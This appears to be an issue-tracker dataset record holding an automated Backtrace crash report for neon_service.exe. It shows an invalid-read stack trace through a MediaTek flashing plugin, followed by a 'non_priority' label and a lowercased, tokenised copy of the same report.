<table> <tr> <td><img src='https://backtrace.io/images/icon.png' width=30 height=30 /></td> <td><b><a href="https://neon.sp.backtrace.io/dashboard/neon/project/neon/group/9ef0db46b0fc17e87a3df98bceaf10f81d1477e83c1e3bf15ac9fabedc911b82">New error: [neon]</a></b><br /><b>1</b> occurrence since (Fri Nov 15 2019 11:27:39)<br /></td> </tr> </table><table> <tr><td><strong>Application</strong></td><td>neon_service.exe</td></tr> <tr> <td><strong>Attributes</strong></td> <td> <strong>version</strong> &mdash; 1 <ul> <li><code>*</code> &mdash; 1</li></ul><br> <strong>product_name</strong> &mdash; 1 <ul> <li><code>*</code> &mdash; 1</li></ul><br></td> </tr> <tr> <td><strong>Classifiers</strong></td> <td> <strong>invalid-read</strong><br></td> </tr> <tr> <td><strong>Frames</strong></td> <td> <code> common_strnlen_c&lt;0,unsigned char&gt; common_strnlen_simd&lt;0,0,unsigned char&gt; common_strnlen&lt;0,unsigned char&gt; strnlen common_vsprintf&lt;__crt_stdio_output::format_validation_base,char&gt; common_vsnprintf_s&lt;char&gt; free_dbg_nolock operator delete operator delete[] FlashMtkPlugin::disconnect_device FlashMtkPlugin::flash_mtk_device std::_Invoker_ret&lt;std::_Unforced,0&gt;::_Call&lt;std::tuple&lt;int,nlohmann::basic_json&lt;std::map,std::vector,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,bool,__int64,unsigned __int64,double,std::allocator,nlohmann::adl_serializer,std::vector&lt;unsigned char,std::allocator&lt;unsigned char&gt; &gt; &gt; &gt; (__thiscall FlashMTK_Plugin::*&amp;)(neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;,unsigned char const *,int *,int *),FlashMTK_Plugin &amp;,neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;,unsigned char const *,int *,int *&gt;( std::_Call_binder&lt;std::_Unforced,0,1,2,3,4,5,std::tuple&lt;int,nlohmann::basic_json&lt;std::map,std::vector,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,bool,__int64,unsigned __int64,double,std::allocator,nlohmann::adl_serializer,std::vector&lt;unsigned char,std::allocator&lt;unsigned char&gt; &gt; &gt; &gt; (__thiscall FlashMTK_Plugin::*)(neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;,unsigned char const *,int *,int *),std::tuple&lt;std::reference_wrapper&lt;FlashMTK_Plugin&gt;,std::_Ph&lt;1&gt;,std::_Ph&lt;2&gt;,std::_Ph&lt;3&gt;,std::_Ph&lt;4&gt;,std::_Ph&lt;5&gt; &gt;,std::tuple&lt;neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &amp;&amp;,unsigned char const * &amp;&amp;,int * &amp;&amp;,int * &amp;&amp;&gt; &gt;(std::_Invoker_ret&lt;std::_Unforced,0&gt;,std::integer_sequence&lt;unsigned int,0,1,2,3,4,5&gt;, std::_Func_impl_no_alloc&lt;std::_Binder&lt;std::_Unforced,std::tuple&lt;int,nlohmann::basic_json&lt;std::map,std::vector,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,bool,__int64,unsigned __int64,double,std::allocator,nlohmann::adl_serializer,std::vector&lt;unsigned char,std::allocator&lt;unsigned char&gt; &gt; &gt; &gt; (__thiscall FlashMTK_Plugin::*)(neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;,unsigned char const *,int *,int *),std::reference_wrapper&lt;FlashMTK_Plugin&gt;,std::_Ph&lt;1&gt; const &amp;,std::_Ph&lt;2&gt; const &amp;,std::_Ph&lt;3&gt; const &amp;,std::_Ph&lt;4&gt; const &amp;,std::_Ph&lt;5&gt; const &amp;&gt;,std::tuple&lt;int,nlohmann::basic_json&lt;std::map,std::vector,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,bool,__int64,unsigned __int64,double,std::allocator,nlohmann::adl_serializer,std::vector&lt;unsigned char,std::allocator&lt;unsigned char&gt; &gt; &gt; &gt;,neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;,unsigned char const *,int *,int *&gt;::_Do_call FlashPlugin::flash_device FlashPlugin::flashing_thread std::thread::_Invoke&lt;std::tuple&lt;`main&#39;::`194&#39;::&lt;lambda_4&gt; &gt;,0&gt; thread_start&lt;unsigned int (__stdcall*)(void *),1&gt;</code> </td> </tr></table>
1.0
[9ef0db] neon_service.exe: common_strnlen_c<0,unsigned char>, common_strnlen_simd<0,0,unsigned char>, common_strnlen<0,unsign... - <table> <tr> <td><img src='https://backtrace.io/images/icon.png' width=30 height=30 /></td> <td><b><a href="https://neon.sp.backtrace.io/dashboard/neon/project/neon/group/9ef0db46b0fc17e87a3df98bceaf10f81d1477e83c1e3bf15ac9fabedc911b82">New error: [neon]</a></b><br /><b>1</b> occurrence since (Fri Nov 15 2019 11:27:39)<br /></td> </tr> </table><table> <tr><td><strong>Application</strong></td><td>neon_service.exe</td></tr> <tr> <td><strong>Attributes</strong></td> <td> <strong>version</strong> &mdash; 1 <ul> <li><code>*</code> &mdash; 1</li></ul><br> <strong>product_name</strong> &mdash; 1 <ul> <li><code>*</code> &mdash; 1</li></ul><br></td> </tr> <tr> <td><strong>Classifiers</strong></td> <td> <strong>invalid-read</strong><br></td> </tr> <tr> <td><strong>Frames</strong></td> <td> <code> common_strnlen_c&lt;0,unsigned char&gt; common_strnlen_simd&lt;0,0,unsigned char&gt; common_strnlen&lt;0,unsigned char&gt; strnlen common_vsprintf&lt;__crt_stdio_output::format_validation_base,char&gt; common_vsnprintf_s&lt;char&gt; free_dbg_nolock operator delete operator delete[] FlashMtkPlugin::disconnect_device FlashMtkPlugin::flash_mtk_device std::_Invoker_ret&lt;std::_Unforced,0&gt;::_Call&lt;std::tuple&lt;int,nlohmann::basic_json&lt;std::map,std::vector,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,bool,__int64,unsigned __int64,double,std::allocator,nlohmann::adl_serializer,std::vector&lt;unsigned char,std::allocator&lt;unsigned char&gt; &gt; &gt; &gt; (__thiscall FlashMTK_Plugin::*&amp;)(neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;,unsigned char const *,int *,int *),FlashMTK_Plugin &amp;,neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;,unsigned char const *,int *,int *&gt;( std::_Call_binder&lt;std::_Unforced,0,1,2,3,4,5,std::tuple&lt;int,nlohmann::basic_json&lt;std::map,std::vector,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,bool,__int64,unsigned __int64,double,std::allocator,nlohmann::adl_serializer,std::vector&lt;unsigned char,std::allocator&lt;unsigned char&gt; &gt; &gt; &gt; (__thiscall FlashMTK_Plugin::*)(neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;,unsigned char const *,int *,int *),std::tuple&lt;std::reference_wrapper&lt;FlashMTK_Plugin&gt;,std::_Ph&lt;1&gt;,std::_Ph&lt;2&gt;,std::_Ph&lt;3&gt;,std::_Ph&lt;4&gt;,std::_Ph&lt;5&gt; &gt;,std::tuple&lt;neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; &amp;&amp;,unsigned char const * &amp;&amp;,int * &amp;&amp;,int * &amp;&amp;&gt; &gt;(std::_Invoker_ret&lt;std::_Unforced,0&gt;,std::integer_sequence&lt;unsigned int,0,1,2,3,4,5&gt;, std::_Func_impl_no_alloc&lt;std::_Binder&lt;std::_Unforced,std::tuple&lt;int,nlohmann::basic_json&lt;std::map,std::vector,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,bool,__int64,unsigned __int64,double,std::allocator,nlohmann::adl_serializer,std::vector&lt;unsigned char,std::allocator&lt;unsigned char&gt; &gt; &gt; &gt; (__thiscall FlashMTK_Plugin::*)(neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;,unsigned char const *,int *,int *),std::reference_wrapper&lt;FlashMTK_Plugin&gt;,std::_Ph&lt;1&gt; const &amp;,std::_Ph&lt;2&gt; const &amp;,std::_Ph&lt;3&gt; const &amp;,std::_Ph&lt;4&gt; const &amp;,std::_Ph&lt;5&gt; const &amp;&gt;,std::tuple&lt;int,nlohmann::basic_json&lt;std::map,std::vector,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,bool,__int64,unsigned __int64,double,std::allocator,nlohmann::adl_serializer,std::vector&lt;unsigned char,std::allocator&lt;unsigned char&gt; &gt; &gt; &gt;,neonflash::Device const &amp;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::map&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt;,std::less&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt;,std::allocator&lt;std::pair&lt;std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; const ,std::basic_string&lt;char,std::char_traits&lt;char&gt;,std::allocator&lt;char&gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt;,unsigned char const *,int *,int *&gt;::_Do_call FlashPlugin::flash_device FlashPlugin::flashing_thread std::thread::_Invoke&lt;std::tuple&lt;`main&#39;::`194&#39;::&lt;lambda_4&gt; &gt;,0&gt; thread_start&lt;unsigned int (__stdcall*)(void *),1&gt;</code> </td> </tr></table>
non_priority
neon service exe common strnlen c common strnlen simd common strnlen occurrence since fri nov application neon service exe attributes version mdash mdash product name mdash mdash classifiers invalid read frames common strnlen c lt unsigned char gt common strnlen simd lt unsigned char gt common strnlen lt unsigned char gt strnlen common vsprintf lt crt stdio output format validation base char gt common vsnprintf s lt char gt free dbg nolock operator delete operator delete flashmtkplugin disconnect device flashmtkplugin flash mtk device std invoker ret lt std unforced gt call lt std tuple lt int nlohmann basic json lt std map std vector std basic string lt char std char traits lt char gt std allocator lt char gt gt bool unsigned double std allocator nlohmann adl serializer std vector lt unsigned char std allocator lt unsigned char gt gt gt gt thiscall flashmtk plugin amp neonflash device const amp std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt gt gt gt unsigned char const int int flashmtk plugin amp neonflash device const amp std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt gt gt gt unsigned char const int int gt std call binder lt std unforced std tuple lt int nlohmann basic json lt std map std vector std basic string lt char std char traits lt char gt std allocator lt char gt gt bool unsigned double std allocator nlohmann adl serializer std vector lt unsigned char std allocator lt unsigned char gt gt gt gt thiscall flashmtk plugin neonflash device const amp std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std map lt std basic string lt char std char traits lt char gt std allocator lt char gt gt std basic string lt char std char traits lt char gt std allocator lt char gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std basic string lt char std char traits lt char gt std allocator lt char gt gt gt gt gt std less lt std basic string lt char std char traits lt char gt std allocator lt char gt gt gt std allocator lt std pair lt std basic string lt char std char traits lt char gt std allocator lt char gt gt const std map lt 